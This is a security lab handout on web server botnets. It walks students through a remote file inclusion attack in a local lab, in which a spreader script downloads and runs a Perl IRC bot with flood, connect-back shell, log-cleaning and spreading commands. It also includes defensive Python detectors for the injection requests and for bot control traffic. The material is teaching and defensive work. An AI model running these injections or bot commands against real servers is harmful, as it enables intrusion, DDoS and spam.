Appendix H: Web Server Botnets
Section 1: Web Server Botnets Background:
Web servers provide the basis for the Internet today. From a web page, users can get information on products, local and world-wide news, email and message boards, even chat functionality. They are dependable systems that are always on, connected to high-bandwidth links designed to accommodate millions of users. A business may spend far more on a single web server than on many desktop machines.
Web servers are priority targets for attackers. A single web server can provide the resources of several, if not hundreds, of individual desktop machines, so an army of high-bandwidth web servers can mount large attacks using fewer systems. They also provide a platform for further abuse: sending spam, hosting phishing websites, and serving as a foothold into the networks behind them. Today's web servers are widely deployed on the open-source LAMP platform (Linux/Apache/MySQL/PHP). The main alternative is the Windows stack: Windows Server, IIS, MSSQL, and ASP. Both are widespread and easy to deploy and use.
The most common entry points are web scripts, written in PHP, CGI, ASP, JSP and others. Many are open source, which makes them popular because they are free to use and customize to the user's needs. The wide variety of vulnerabilities in these scripts gives attackers numerous entry points. One server can host hundreds (or more) of them, but it only takes one to allow a successful compromise. The easiest and most common is Remote File Inclusion (RFI; this handout also calls it remote file injection): a script passes attacker-controlled input to include() or a similar function, so the attacker can make the server fetch and execute code from any URL, straight from a web browser or an automated scanner. This gives “script kiddies” easy access to compromise your site.
A profitable injection connects the compromised server to a botnet for easy control, so that its capacity can be sold to another party for spamming, DDoS, and so on. IRC botnet scripts are well known and frequently used. Often an innocent IRC server is used to run such a botnet: a little IRC traffic to a hidden channel is not usually something administrators notice. Search engines are another part of a successful injection campaign. If a web site is out there, Google can be used to find and exploit it; such “Google dorks” (search queries crafted to match a known vulnerable script) let attackers quickly find exploitable web sites.
Resources:
Evron, Gadi. “Web Server Botnets and Server Farms as Attack Platforms.” Virus Bulletin, February 2007. Available from http://www.circleid.com/posts/web_server_botnets_farms_attack/
Lab Instructions:
Before you start, edit the server address in the file /apache2/htdocs/botfiles/well.txt (the IRC server the bot will connect to) and change it to the IP of your host machine. The line in the Perl script looks like this; keep the single quotes:
$servidor='57.35.6.86' unless $servidor;
If you haven’t yet, start IRCd on your WS 4.0.
/usr/local/sbin/ircd -s
Go to http://localhost/botfiles/ver3.txt and you should see a short block of PHP code.
This is our tester (echo) script. It allows the bot to determine whether the injection succeeded before attempting further compromise. Such files can be any text file; they are often named as images (.jpg, .gif, etc.) to hide them. They must be web-accessible, usually on someone else's host that has already been compromised or on a free web-hosting service.
Load up our remote file inclusion by requesting:
http://(ipaddress)/rfi/index.php?path=http://localhost/botfiles/ver3.txt?
The trailing ? is deliberate: anything the vulnerable script appends to the path (such as .php) becomes a query string of the remote request, so the file server still returns ver3.txt unchanged.
Notice that while we are using one server, it plays three roles:
- (ipaddress) is the host being attacked
- localhost is the file server hosting the scripts
- (ipaddress) is also the IRC server
These can all be different machines, and none of them need be where the attacker really is.
Notice all the information we obtained. Our keyword here is ‘Mic22’, which the tester script echoes back to the client so we know the site is vulnerable.
SCREENSHOT:Take a screenshot of a successful Remote File Injection of our tester script.
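The same injection leaves a clear trace in the target's Apache access log. The following Python script is an added example for this handout (it is not one of the lab files and not from the Virus Bulletin article); it parses combined-format log lines and flags inclusion attempts: a remote URL in a parameter, the trailing ? trick used above, a PHP stream wrapper, or a %00 null byte. The log lines in SAMPLE_LOG are constructed to mirror the lab's requests, not captured from a real host.

```python
"""Flag remote-file-inclusion attempts in Apache access logs.

Added example for this handout; it is not part of the lab files or of the
Virus Bulletin article. The log lines in SAMPLE_LOG are constructed for
illustration, not captured from a real host.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Apache combined log format: client ident user [time] "METHOD target proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<bytes>\S+)'
)

# Parameter values that make include()/require() load code from outside the
# web root: a remote URL, or a PHP stream wrapper such as php://input.
REMOTE_RE = re.compile(r'^(https?|ftps?)://', re.IGNORECASE)
WRAPPER_RE = re.compile(r'^(php|data|expect|phar|zip)://', re.IGNORECASE)


def classify_value(value):
    """Return the inclusion indicators found in one decoded parameter value."""
    indicators = []
    if REMOTE_RE.match(value):
        indicators.append("remote-url")
        # The trailing '?' trick from the lab: whatever the vulnerable script
        # appends (e.g. '.php') becomes a query string of the remote fetch,
        # so the attacker's file is served unchanged.
        if value.endswith("?"):
            indicators.append("trailing-?")
    if WRAPPER_RE.match(value):
        indicators.append("stream-wrapper")
    if "\x00" in value:
        # %00 truncates the path in old PHP; the local-file-inclusion cousin of RFI.
        indicators.append("null-byte")
    return indicators


def scan_line(line):
    """Parse one log line; return a finding dict, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m["target"]).query
    hits = {}
    # parse_qsl percent-decodes values, so %00 arrives as a real NUL byte.
    for name, value in parse_qsl(query, keep_blank_values=True):
        found = classify_value(value)
        if found:
            hits[name] = found
    if not hits:
        return None
    return {"client": m["client"], "status": int(m["status"]),
            "target": m["target"], "hits": hits}


def scan_log(text):
    """Run scan_line over a whole log and keep only the findings."""
    return [f for f in map(scan_line, text.splitlines()) if f]


# Constructed sample: the two lab requests, a benign request, and two common variants.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2007:10:15:02 -0500] "GET /rfi/index.php?path=http://localhost/botfiles/ver3.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2007:10:15:09 -0500] "GET /rfi/index.php?path=http://localhost/botfiles/select.txt? HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Mar/2007:10:16:30 -0500] "GET /rfi/index.php?path=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2007:10:17:01 -0500] "GET /rfi/index.php?path=php://input HTTP/1.1" 200 30 "-" "libwww-perl/5.805"
198.51.100.9 - - [12/Mar/2007:10:17:05 -0500] "GET /rfi/index.php?path=/etc/passwd%00 HTTP/1.1" 200 30 "-" "libwww-perl/5.805"
"""

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["client"], finding["status"], finding["hits"], finding["target"])
```

Run it against a real access log with scan_log(open(path).read()). A 200 status on a flagged request is not proof of compromise (the script may have ignored the parameter), which is exactly why the attacker's tester script echoes a keyword such as Mic22: the attacker needs that confirmation as much as the defender does.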
Spreader / Beachhead script
Let's take a look at the second script this uses:
http://localhost/botfiles/select.txt
This script attempts to download and execute code from our file host, http://localhost/botfiles/well.txt. Notice that it tries every PHP function that can run a shell command, because any one of them may be disabled on the target:
exec() passthru() system() shell_exec()
(An administrator can disable these with disable_functions in php.ini, and setting allow_url_include=Off, the default since PHP 5.2, blocks include() of remote URLs altogether.)
Next it tries to download the file using a number of command-line tools, again because any one of them may be missing:
wget curl get fetch
Once the Perl script is downloaded, it is executed and then deleted. Try our injection now:
http://(ipaddress)/rfi/index.php?path=http://localhost/botfiles/select.txt?
You'll notice the browser window doesn't actually respond: Firefox keeps waiting for data that is never sent, because this script returns no output at all.
The Compromise
We get no browser output, but check our IRC channel: a new bot has connected, named Just.
Just like any other botnet, we can send it commands to do all kinds of things. Check out the code in http://localhost/botfiles/well.txt
#You can use the following commands :
#!sh @portscan <ip>
#!sh @nmap <ip> <beginport> <endport>
#!sh @back <ip> <port>
#!sh @udpflood <ip> <packet size> <time>
#!sh @tcpflood <ip> <port> <packet size> <time>
#!sh @httpflood <site> <time>
#!sh @linuxhelp
#!sh @rfi <vuln> <dork>
#!sh @system
#!sh @milw0rm
#!sh @logcleaner
#!sh @deface
#!sh @spread <rfi = for example www.mywebsite.com/index.php?= >
#!sh @sendmail <subject> <sender> <recipient> <message>
Interesting commands include:
#!sh @spread localhost/botfiles/ver3.txt
This sets the file used to spread our botnet.
#!sh @rfi <vuln> <dork>
This searches for targets using <dork> in the Google, Yahoo, MSN and AllTheWeb search engines and runs vulnerability <vuln> against each hit.
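Because every order to the bot is an ordinary IRC PRIVMSG beginning with the fixed prefix #!sh @, the control traffic is easy to recognise once you know the command table above. The following Python script is an added example for this handout, not code from the lab's bot: it parses PRIVMSG lines, matches the command names and argument counts taken from the bot's help text, and reports malformed or suspicious orders. The channel name #botz, the nicks, the IP addresses and every line in SAMPLE_IRC are constructed for illustration.

```python
"""Recognise the well.txt bot's control commands in captured IRC traffic.

Added example for this handout; it is not code from the lab's bot. The
command table is copied from the bot's own help text (argument counts and the
'#!sh @' prefix); the PRIVMSG lines in SAMPLE_IRC are constructed, not captured.
"""
import re

# command -> (argument count, category), from the bot's help text
COMMANDS = {
    "portscan": (1, "recon"),
    "nmap": (3, "recon"),
    "back": (2, "shell"),          # connect-back shell to <ip> <port>
    "udpflood": (3, "ddos"),
    "tcpflood": (4, "ddos"),
    "httpflood": (2, "ddos"),
    "linuxhelp": (0, "info"),
    "rfi": (2, "spread"),
    "system": (0, "info"),
    "milw0rm": (0, "info"),
    "logcleaner": (0, "anti-forensics"),
    "deface": (0, "deface"),
    "spread": (1, "spread"),
    "sendmail": (4, "spam"),
}
TRIGGER = "#!sh @"

# :nick!user@host PRIVMSG #channel :text
PRIVMSG_RE = re.compile(r'^:(?P<nick>[^!\s]+)\S* PRIVMSG (?P<target>\S+) :(?P<text>.*)$')


def parse_control(line):
    """Return a dict describing a bot command, or None for ordinary chat."""
    m = PRIVMSG_RE.match(line)
    if not m or not m["text"].startswith(TRIGGER):
        return None
    words = m["text"][len(TRIGGER):].split()
    if not words or words[0] not in COMMANDS:
        return None
    name, args = words[0], words[1:]
    arity, category = COMMANDS[name]
    # sendmail's last argument, <message>, may itself contain spaces
    if name == "sendmail" and len(args) > 4:
        args = args[:3] + [" ".join(args[3:])]
    return {
        "nick": m["nick"],
        "channel": m["target"],
        "command": name,
        "args": args,
        "category": category,
        # a wrong argument count usually means a typo by the controller,
        # or a different bot family sharing the same prefix
        "well_formed": len(args) == arity,
    }


def scan_irc(text):
    """Parse every line of a capture and keep only bot commands."""
    return [c for c in map(parse_control, text.splitlines()) if c]


# Constructed sample: controller orders, one bot reply, one malformed order, one chat line.
SAMPLE_IRC = """\
:Mic22!~m@203.0.113.7 PRIVMSG #botz :#!sh @system
:Just!~apache@192.0.2.10 PRIVMSG #botz :uname: Linux 2.6.18 i686
:Mic22!~m@203.0.113.7 PRIVMSG #botz :#!sh @udpflood 198.51.100.20 1024 60
:Mic22!~m@203.0.113.7 PRIVMSG #botz :#!sh @spread localhost/botfiles/ver3.txt
:Mic22!~m@203.0.113.7 PRIVMSG #botz :#!sh @sendmail Hello sender@example.com victim@example.com buy now
:Mic22!~m@203.0.113.7 PRIVMSG #botz :#!sh @tcpflood 198.51.100.20 80
:someone!~u@192.0.2.5 PRIVMSG #botz :hi all
"""

if __name__ == "__main__":
    for cmd in scan_irc(SAMPLE_IRC):
        flag = "" if cmd["well_formed"] else " (malformed)"
        print(cmd["nick"], cmd["channel"], cmd["category"], cmd["command"], cmd["args"], flag)
```

On a real network the input would be the payload of port 6667 (or whatever port the bot uses) sessions from a web server that has no business speaking IRC; the prefix alone is a good IDS signature, and the category tells an incident responder whether the host was being used for DDoS, spam, or to spread further.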